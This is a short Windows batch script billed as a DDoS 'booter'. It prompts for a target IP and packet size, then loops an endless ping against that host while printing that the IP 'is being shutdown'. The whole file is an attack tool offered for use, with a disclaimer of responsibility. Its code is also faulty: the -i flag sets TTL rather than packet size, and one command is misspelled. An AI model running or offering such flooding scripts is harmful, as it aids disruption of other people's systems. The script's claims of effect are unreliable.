@echo off
mode 67,16
title DDOS Attack Created By (BDM Diamondz)
color 0b
cls
echo.
echo BDM Diamondz DDOS is ready to serve you...
ehco BDM Diamondz does not take any responsibiliy for how you use this booter.
echo ---------------------------------------------------------------------------------------------------------------------------------------------
echo.
set /p x=Server-Target:
echo.
ping %x%
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
goto Next

:Next
echo.
echo.
echo.
set /p m=ip Host:
echo.
set /p n=Packet Size:
echo.

:DDOS
color 0c
echo {Ip is being shutdown please wait} %m%
ping %m% -i %n% -t >nul
goto DDOS
